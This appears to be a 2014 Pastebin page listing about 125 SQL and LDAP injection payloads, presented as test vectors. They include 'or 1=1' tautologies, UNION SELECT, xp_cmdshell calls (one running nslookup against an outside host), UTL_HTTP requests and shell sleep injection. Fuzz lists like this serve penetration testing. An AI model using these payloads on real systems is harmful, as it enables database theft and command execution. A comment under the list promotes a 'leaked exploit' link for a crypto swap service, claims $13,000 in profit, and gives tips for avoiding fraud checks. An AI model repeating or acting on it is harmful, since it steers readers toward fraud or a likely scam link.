Tophat

SQL Injection Payload Vectors for testing SQL Injections.

Jan 22nd, 2014
1,498
0
Never
12
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.57 KB | None | 0 0
  1. '
  2. "
  3. #
  4. -
  5. --
  6. '%20--
  7. --';
  8. '%20;
  9. =%20'
  10. =%20;
  11. =%20--
  12. \x23
  13. \x27
  14. \x3D%20\x3B'
  15. \x3D%20\x27
  16. \x27\x4F\x52 SELECT *
  17. \x27\x6F\x72 SELECT *
  18. 'or%20select *
  19. admin'--
  20. <>"'%;)(&+
  21. '%20or%20''='
  22. '%20or%20'x'='x
  23. "%20or%20"x"="x
  24. ')%20or%20('x'='x
  25. 0 or 1=1
  26. ' or 0=0 --
  27. " or 0=0 --
  28. or 0=0 --
  29. ' or 0=0 #
  30. " or 0=0 #
  31. or 0=0 #
  32. ' or 1=1--
  33. " or 1=1--
  34. ' or '1'='1'--
  35. "' or 1 --'"
  36. or 1=1--
  37. or%201=1
  38. or%201=1 --
  39. ' or 1=1 or ''='
  40. " or 1=1 or ""="
  41. ' or a=a--
  42. " or "a"="a
  43. ') or ('a'='a
  44. ") or ("a"="a
  45. coded32" or "a"="a
  46. coded32" or 1=1 --
  47. coded32' or 1=1 --
  48. coded32' or 'a'='a
  49. coded32') or ('a'='a
  50. hi") or ("a"="a
  51. 'hi' or 'x'='x';
  52. @variable
  53. ,@variable
  54. PRINT
  55. PRINT @@variable
  56. select
  57. insert
  58. as
  59. or
  60. procedure
  61. limit
  62. order by
  63. asc
  64. desc
  65. delete
  66. update
  67. distinct
  68. having
  69. truncate
  70. replace
  71. like
  72. handler
  73. bfilename
  74. ' or username like '%
  75. ' or uname like '%
  76. ' or userid like '%
  77. ' or uid like '%
  78. ' or user like '%
  79. exec xp
  80. exec sp
  81. '; exec master..xp_cmdshell
  82. '; exec xp_regread
  83. t'exec master..xp_cmdshell 'nslookup www.google.com'--
  84. --sp_password
  85. \x27UNION SELECT
  86. ' UNION SELECT
  87. ' UNION ALL SELECT
  88. ' or (EXISTS)
  89. ' (select top 1
  90. '||UTL_HTTP.REQUEST
  91. 1;SELECT%20*
  92. to_timestamp_tz
  93. tz_offset
  94. &lt;&gt;&quot;'%;)(&amp;+
  95. '%20or%201=1
  96. %27%20or%201=1
  97. %20$(sleep%2050)
  98. %20'sleep%2050'
  99. char%4039%41%2b%40SELECT
  100. &apos;%20OR
  101. 'sqlattempt1
  102. (sqlattempt2)
  103. |
  104. %7C
  105. *|
  106. %2A%7C
  107. *(|(mail=*))
  108. %2A%28%7C%28mail%3D%2A%29%29
  109. *(|(objectclass=*))
  110. %2A%28%7C%28objectclass%3D%2A%29%29
  111. (
  112. %28
  113. )
  114. %29
  115. &
  116. %26
  117. !
  118. %21
  119. ' or 1=1 or ''='
  120. ' or ''='
  121. x' or 1=1 or 'x'='y
  122. /
  123. //
  124. //*
  125. */*
Advertisement
Comments
  • User was banned
  • BassMaxAttack
    173 days
    # CSS 0.78 KB | 0 0
    1. ✅ Leaked Exploit Documentation:
    2.  
    3. https://rawtext.host/raw?44lh4m
    4.  
    5. This made me $13,000 in 2 days.
    6.  
    7. Important: If you plan to use the exploit more than once, remember that after the first successful swap you must wait 24 hours before using it again. Otherwise, there is a high chance that your transaction will be flagged for additional verification, and if that happens, you won't receive the extra 38% — they will simply correct the exchange rate.
    8. The first COMPLETED transaction always goes through — this has been tested and confirmed over the last days.
    9.  
    10. Edit: I've gotten a lot of questions about the maximum amount it works for — as far as I know, there is no maximum amount. The only limit is the 24-hour cooldown (1 use per day without any verification from Swapzone — instant swap).
  • User was banned
  • User was banned
  • User was banned
  • User was banned
  • User was banned
  • User was banned
  • User was banned
  • User was banned
  • User was banned
  • User was banned
Add Comment
Please, Sign In to add comment